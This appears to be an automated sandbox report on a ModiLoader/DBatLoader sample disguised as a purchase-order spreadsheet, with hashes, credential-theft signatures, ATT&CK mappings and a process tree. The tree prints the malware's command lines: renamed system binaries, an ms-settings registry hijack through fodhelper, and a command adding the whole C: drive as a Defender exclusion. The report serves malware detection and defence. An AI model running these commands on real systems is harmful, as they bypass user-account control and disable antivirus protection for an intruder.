Analysis

  • max time kernel
    149s
  • max time network
    119s
  • platform
    windows7_x64
  • resource
    win7-20240508-en
  • resource tags

    arch:x64arch:x86image:win7-20240508-enlocale:en-usos:windows7-x64system
  • submitted
    27-06-2024 19:10

General

  • Target

    New PO -39850-1064 -2084-GEN101 -Order,xls.exe

  • Size

    1.1MB

  • MD5

    b3e46d9e108107da316136965308482d

  • SHA1

    e6fe35708b4fe7b16bbf41596953fe5e8ff53b2a

  • SHA256

    f785cc537cb807746d44c134899d64c9133b22c958f0cb4dd7a92f5af9da413f

  • SHA512

    9724d2ebe1137ac605586b13d0d0d58c8bb5e65edc22ffee162ac318db97f13e4bd6d4175721fb51c163751e4a3de23ee7456e229e499ea751ef4f827d4d9438

  • SSDEEP

    12288:uSO7HrAp5/yBMHZ0tdOsUDSo4Or9p+jDngeGF6OLMyWpldQ1QHFwfmxysAkmCqff:0fC/yuHZ0tdgDSvw9p8D7Gd9xu+DTSq

Malware Config

Signatures

  • ModiLoader, DBatLoader

    ModiLoader is a Delphi loader that misuses cloud services to download other malicious families.

  • ModiLoader Second Stage 2 IoCs
  • Executes dropped EXE 20 IoCs
  • Loads dropped DLL 16 IoCs
  • Reads WinSCP keys stored on the system 2 TTPs

    Tries to access WinSCP stored sessions.

  • Reads data files stored by FTP clients 2 TTPs

    Tries to access configuration files associated with programs like FileZilla.

  • Reads user/profile data of local email clients 2 TTPs

    Email clients store some user data on disk where infostealers will often target it.

  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Adds Run key to start application 2 TTPs 1 IoCs
  • Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs
  • Suspicious use of SetThreadContext 2 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Kills process with taskkill 1 IoCs
  • Modifies registry class 5 IoCs
  • Runs ping.exe 1 TTPs 1 IoCs
  • Script User-Agent 2 IoCs

    Uses user-agent string associated with script host/environment.

  • Suspicious behavior: EnumeratesProcesses 3 IoCs
  • Suspicious use of AdjustPrivilegeToken 3 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\New PO -39850-1064 -2084-GEN101 -Order,xls.exe
    "C:\Users\Admin\AppData\Local\Temp\New PO -39850-1064 -2084-GEN101 -Order,xls.exe"
    1⤵
    • Loads dropped DLL
    • Adds Run key to start application
    • Suspicious use of SetThreadContext
    • Suspicious use of WriteProcessMemory
    PID:2716
    • C:\Users\Public\Libraries\inqqjayC.pif
      C:\Users\Public\Libraries\inqqjayC.pif
      2⤵
      • Executes dropped EXE
      • Suspicious use of WriteProcessMemory
      PID:2356
      • C:\Windows\system32\cmd.exe
        "C:\Windows\sysnative\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\473D.tmp\473E.tmp\473F.bat C:\Users\Public\Libraries\inqqjayC.pif"
        3⤵
        • Loads dropped DLL
        • Suspicious use of WriteProcessMemory
        PID:2740
        • C:\Windows\System32\extrac32.exe
          C:\\Windows\\System32\\extrac32 /C /Y C:\\Windows\\System32\\cmd.exe "C:\\Users\\Public\\alpha.exe"
          4⤵
            PID:2056
          • C:\Users\Public\alpha.exe
            C:\\Users\\Public\\alpha /c mkdir "\\?\C:\Windows "
            4⤵
            • Executes dropped EXE
            PID:2792
          • C:\Users\Public\alpha.exe
            C:\\Users\\Public\\alpha /c mkdir "\\?\C:\Windows \System32"
            4⤵
            • Executes dropped EXE
            PID:2744
          • C:\Users\Public\alpha.exe
            C:\\Users\\Public\\alpha /c extrac32 /C /Y C:\\Windows\\System32\\reg.exe "C:\\Users\\Public\\ger.exe"
            4⤵
            • Executes dropped EXE
            • Suspicious use of WriteProcessMemory
            PID:2808
            • C:\Windows\system32\extrac32.exe
              extrac32 /C /Y C:\\Windows\\System32\\reg.exe "C:\\Users\\Public\\ger.exe"
              5⤵
                PID:2828
            • C:\Users\Public\alpha.exe
              C:\\Users\\Public\\alpha /c extrac32 /C /Y C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe "C:\\Users\\Public\\xkn.exe"
              4⤵
              • Executes dropped EXE
              • Suspicious use of WriteProcessMemory
              PID:2196
              • C:\Windows\system32\extrac32.exe
                extrac32 /C /Y C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe "C:\\Users\\Public\\xkn.exe"
                5⤵
                  PID:2688
              • C:\Users\Public\alpha.exe
                C:\\Users\\Public\\alpha /c extrac32 /C /Y C:\\Windows\\System32\\fodhelper.exe "C:\\Windows \\System32\\per.exe"
                4⤵
                • Executes dropped EXE
                • Suspicious use of WriteProcessMemory
                PID:2756
                • C:\Windows\system32\extrac32.exe
                  extrac32 /C /Y C:\\Windows\\System32\\fodhelper.exe "C:\\Windows \\System32\\per.exe"
                  5⤵
                    PID:2540
                • C:\Users\Public\alpha.exe
                  C:\\Users\\Public\\alpha /c C:\\Users\\Public\\xkn -WindowStyle hidden -Command "C:\\Users\\Public\\alpha /c C:\\Users\\Public\\ger add HKCU\Software\Classes\ms-settings\shell\open\command /f /ve /t REG_SZ /d 'C:\\Users\\Public\\xkn -WindowStyle hidden -Command "Add-MpPreference -ExclusionPath C:\"' ; "
                  4⤵
                  • Executes dropped EXE
                  • Loads dropped DLL
                  • Suspicious use of WriteProcessMemory
                  PID:2556
                  • C:\Users\Public\xkn.exe
                    C:\\Users\\Public\\xkn -WindowStyle hidden -Command "C:\\Users\\Public\\alpha /c C:\\Users\\Public\\ger add HKCU\Software\Classes\ms-settings\shell\open\command /f /ve /t REG_SZ /d 'C:\\Users\\Public\\xkn -WindowStyle hidden -Command "Add-MpPreference -ExclusionPath C:\"' ; "
                    5⤵
                    • Executes dropped EXE
                    • Loads dropped DLL
                    • Suspicious behavior: EnumeratesProcesses
                    • Suspicious use of AdjustPrivilegeToken
                    • Suspicious use of WriteProcessMemory
                    PID:2600
                    • C:\Users\Public\alpha.exe
                      "C:\Users\Public\alpha.exe" /c C:\\Users\\Public\\ger add HKCU\Software\Classes\ms-settings\shell\open\command /f /ve /t REG_SZ /d "C:\\Users\\Public\\xkn -WindowStyle hidden -Command Add-MpPreference -ExclusionPath C:""
                      6⤵
                      • Executes dropped EXE
                      • Loads dropped DLL
                      • Suspicious use of WriteProcessMemory
                      PID:1296
                      • C:\Users\Public\ger.exe
                        C:\\Users\\Public\\ger add HKCU\Software\Classes\ms-settings\shell\open\command /f /ve /t REG_SZ /d "C:\\Users\\Public\\xkn -WindowStyle hidden -Command Add-MpPreference -ExclusionPath C:""
                        7⤵
                        • Executes dropped EXE
                        • Modifies registry class
                        PID:1448
                • C:\Users\Public\alpha.exe
                  C:\\Users\\Public\\alpha /c taskkill /F /IM SystemSettings.exe
                  4⤵
                  • Executes dropped EXE
                  • Suspicious use of WriteProcessMemory
                  PID:2780
                  • C:\Windows\system32\taskkill.exe
                    taskkill /F /IM SystemSettings.exe
                    5⤵
                    • Kills process with taskkill
                    • Suspicious use of AdjustPrivilegeToken
                    PID:2704
                • C:\Users\Public\alpha.exe
                  C:\\Users\\Public\\alpha /c ping 127.0.0.1 -n 2
                  4⤵
                  • Executes dropped EXE
                  • Suspicious use of WriteProcessMemory
                  PID:1604
                  • C:\Windows\system32\PING.EXE
                    ping 127.0.0.1 -n 2
                    5⤵
                    • Runs ping.exe
                    PID:2448
                • C:\Users\Public\alpha.exe
                  C:\\Users\\Public\\alpha /c del /q "C:\Windows \System32\*"
                  4⤵
                  • Executes dropped EXE
                  PID:1300
                • C:\Users\Public\alpha.exe
                  C:\\Users\\Public\\alpha /c rmdir "C:\Windows \System32"
                  4⤵
                  • Executes dropped EXE
                  PID:1508
                • C:\Users\Public\alpha.exe
                  C:\\Users\\Public\\alpha /c rmdir "C:\Windows \"
                  4⤵
                  • Executes dropped EXE
                  PID:1776
                • C:\Users\Public\alpha.exe
                  C:\\Users\\Public\\alpha /c del /q "C:\\Windows \\System32\\per.exe" / A / F / Q / S
                  4⤵
                  • Executes dropped EXE
                  PID:1244
                • C:\Users\Public\alpha.exe
                  C:\\Users\\Public\\alpha /c del /q "C:\Users\Public\ger.exe" / A / F / Q / S
                  4⤵
                  • Executes dropped EXE
                  PID:1284
                • C:\Users\Public\alpha.exe
                  C:\\Users\\Public\\alpha /c del /q "C:\Users\Public\kn.exe" / A / F / Q / S
                  4⤵
                  • Executes dropped EXE
                  PID:848
                • C:\Users\Public\alpha.exe
                  C:\\Users\\Public\\alpha /c del /q "C:\Users\Public\xkn.exe" / A / F / Q / S
                  4⤵
                  • Executes dropped EXE
                  PID:1256
            • C:\Windows\SysWOW64\extrac32.exe
              C:\\Windows\\System32\\extrac32.exe /C /Y C:\Users\Admin\AppData\Local\Temp\New PO -39850-1064 -2084-GEN101 -Order,xls.exe C:\\Users\\Public\\Libraries\\Cyajqqni.PIF
              2⤵
                PID:2092
              • C:\Users\Public\Libraries\inqqjayC.pif
                C:\Users\Public\Libraries\inqqjayC.pif
                2⤵
                • Executes dropped EXE
                • Suspicious behavior: EnumeratesProcesses
                • Suspicious use of AdjustPrivilegeToken
                PID:1248

            Network

            MITRE ATT&CK Matrix ATT&CK v13

            Persistence

            Boot or Logon Autostart Execution

            1
            T1547

            Registry Run Keys / Startup Folder

            1
            T1547.001

            Privilege Escalation

            Boot or Logon Autostart Execution

            1
            T1547

            Registry Run Keys / Startup Folder

            1
            T1547.001

            Defense Evasion

            Modify Registry

            1
            T1112

            Credential Access

            Unsecured Credentials

            4
            T1552

            Credentials In Files

            3
            T1552.001

            Credentials in Registry

            1
            T1552.002

            Discovery

            System Information Discovery

            1
            T1082

            Remote System Discovery

            1
            T1018

            Collection

            Data from Local System

            4
            T1005

            Command and Control

            Web Service

            1
            T1102

            Replay Monitor

            Loading Replay Monitor...

            Downloads

            • C:\Users\Admin\AppData\Local\Temp\473D.tmp\473E.tmp\473F.bat
              Filesize

              1KB

              MD5

              e62f427202d3e5a3ba60ebe78567918c

              SHA1

              6ef0cd5ba6c871815fceb27ff095a7931452b334

              SHA256

              06bee225a830ea0e67b91fd7d24280c5315ef82049b25b07c9cfde4e36a639ff

              SHA512

              e15148ba4099f3b8c73319be32a5f76226d21e7fb90123bec68e5106d03b7d3e8af8caa0421667920967e8921787ba255dc4bf23d35792bf8e9a20f1e18283c6

            • C:\Users\Public\ger.exe
              Filesize

              73KB

              MD5

              9d0b3066fe3d1fd345e86bc7bcced9e4

              SHA1

              e05984a6671fcfecbc465e613d72d42bda35fd90

              SHA256

              4e66b857b7010db8d4e4e28d73eb81a99bd6915350bb9a63cd86671051b22f0e

              SHA512

              d773ca3490918e26a42f90f5c75a0728b040e414d03599ca70e99737a339858e9f0c99711bed8eeebd5e763d10d45e19c4e7520ee62d6957bc9799fd62d4e119

            • \Users\Public\Libraries\inqqjayC.pif
              Filesize

              66KB

              MD5

              c116d3604ceafe7057d77ff27552c215

              SHA1

              452b14432fb5758b46f2897aeccd89f7c82a727d

              SHA256

              7bcdc2e607abc65ef93afd009c3048970d9e8d1c2a18fc571562396b13ebb301

              SHA512

              9202a00eeaf4c5be94de32fd41bfea40fc32d368955d49b7bad2b5c23c4ebc92dccb37d99f5a14e53ad674b63f1baa6efb1feb27225c86693ead3262a26d66c6

            • \Users\Public\alpha.exe
              Filesize

              337KB

              MD5

              5746bd7e255dd6a8afa06f7c42c1ba41

              SHA1

              0f3c4ff28f354aede202d54e9d1c5529a3bf87d8

              SHA256

              db06c3534964e3fc79d2763144ba53742d7fa250ca336f4a0fe724b75aaff386

              SHA512

              3a968356d7b94cc014f78ca37a3c03f354c3970c9e027ed4ccb8e59f0f9f2a32bfa22e7d6b127d44631d715ea41bf8ace91f0b4d69d1714d55552b064ffeb69e

            • \Users\Public\xkn.exe
              Filesize

              462KB

              MD5

              852d67a27e454bd389fa7f02a8cbe23f

              SHA1

              5330fedad485e0e4c23b2abe1075a1f984fde9fc

              SHA256

              a8fdba9df15e41b6f5c69c79f66a26a9d48e174f9e7018a371600b866867dab8

              SHA512

              327dc74590f34185735502e289135491092a453f7f1c5ee9e588032ff68934056ffa797f28181267fd9670f7895e1350894b16ea7b0e34a190597f14aea09a4d

            • memory/1248-92-0x0000000034190000-0x00000000341E3000-memory.dmp
              Filesize

              332KB

            • memory/1248-118-0x0000000034190000-0x00000000341E3000-memory.dmp
              Filesize

              332KB

            • memory/1248-128-0x0000000034190000-0x00000000341E3000-memory.dmp
              Filesize

              332KB

            • memory/1248-98-0x0000000034190000-0x00000000341E3000-memory.dmp
              Filesize

              332KB

            • memory/1248-96-0x0000000034190000-0x00000000341E3000-memory.dmp
              Filesize

              332KB

            • memory/1248-132-0x0000000034190000-0x00000000341E3000-memory.dmp
              Filesize

              332KB

            • memory/1248-134-0x0000000034190000-0x00000000341E3000-memory.dmp
              Filesize

              332KB

            • memory/1248-136-0x0000000034190000-0x00000000341E3000-memory.dmp
              Filesize

              332KB

            • memory/1248-138-0x0000000034190000-0x00000000341E3000-memory.dmp
              Filesize

              332KB

            • memory/1248-140-0x0000000034190000-0x00000000341E3000-memory.dmp
              Filesize

              332KB

            • memory/1248-79-0x0000000000400000-0x0000000001400000-memory.dmp
              Filesize

              16.0MB

            • memory/1248-81-0x0000000000400000-0x0000000001400000-memory.dmp
              Filesize

              16.0MB

            • memory/1248-83-0x0000000034130000-0x000000003418A000-memory.dmp
              Filesize

              360KB

            • memory/1248-84-0x0000000034190000-0x00000000341EA000-memory.dmp
              Filesize

              360KB

            • memory/1248-85-0x0000000034190000-0x00000000341E3000-memory.dmp
              Filesize

              332KB

            • memory/1248-100-0x0000000034190000-0x00000000341E3000-memory.dmp
              Filesize

              332KB

            • memory/1248-88-0x0000000034190000-0x00000000341E3000-memory.dmp
              Filesize

              332KB

            • memory/1248-90-0x0000000034190000-0x00000000341E3000-memory.dmp
              Filesize

              332KB

            • memory/1248-94-0x0000000034190000-0x00000000341E3000-memory.dmp
              Filesize

              332KB

            • memory/1248-104-0x0000000034190000-0x00000000341E3000-memory.dmp
              Filesize

              332KB

            • memory/1248-130-0x0000000034190000-0x00000000341E3000-memory.dmp
              Filesize

              332KB

            • memory/1248-112-0x0000000034190000-0x00000000341E3000-memory.dmp
              Filesize

              332KB

            • memory/1248-86-0x0000000034190000-0x00000000341E3000-memory.dmp
              Filesize

              332KB

            • memory/1248-102-0x0000000034190000-0x00000000341E3000-memory.dmp
              Filesize

              332KB

            • memory/1248-106-0x0000000034190000-0x00000000341E3000-memory.dmp
              Filesize

              332KB

            • memory/1248-110-0x0000000034190000-0x00000000341E3000-memory.dmp
              Filesize

              332KB

            • memory/1248-108-0x0000000034190000-0x00000000341E3000-memory.dmp
              Filesize

              332KB

            • memory/1248-124-0x0000000034190000-0x00000000341E3000-memory.dmp
              Filesize

              332KB

            • memory/1248-126-0x0000000034190000-0x00000000341E3000-memory.dmp
              Filesize

              332KB

            • memory/1248-122-0x0000000034190000-0x00000000341E3000-memory.dmp
              Filesize

              332KB

            • memory/1248-120-0x0000000034190000-0x00000000341E3000-memory.dmp
              Filesize

              332KB

            • memory/1248-114-0x0000000034190000-0x00000000341E3000-memory.dmp
              Filesize

              332KB

            • memory/1248-116-0x0000000034190000-0x00000000341E3000-memory.dmp
              Filesize

              332KB

            • memory/2356-14-0x0000000000400000-0x000000000041A000-memory.dmp
              Filesize

              104KB

            • memory/2356-11-0x0000000000400000-0x0000000001400000-memory.dmp
              Filesize

              16.0MB

            • memory/2356-70-0x0000000000400000-0x0000000001400000-memory.dmp
              Filesize

              16.0MB

            • memory/2356-72-0x0000000000400000-0x000000000041A000-memory.dmp
              Filesize

              104KB

            • memory/2356-13-0x0000000000400000-0x0000000001400000-memory.dmp
              Filesize

              16.0MB

            • memory/2600-48-0x0000000000380000-0x0000000000388000-memory.dmp
              Filesize

              32KB

            • memory/2600-47-0x000000001B600000-0x000000001B8E2000-memory.dmp
              Filesize

              2.9MB

            • memory/2716-0-0x0000000000220000-0x0000000000221000-memory.dmp
              Filesize

              4KB

            • memory/2716-1-0x0000000000220000-0x0000000000221000-memory.dmp
              Filesize

              4KB

            • memory/2716-2-0x0000000000400000-0x0000000000520000-memory.dmp
              Filesize

              1.1MB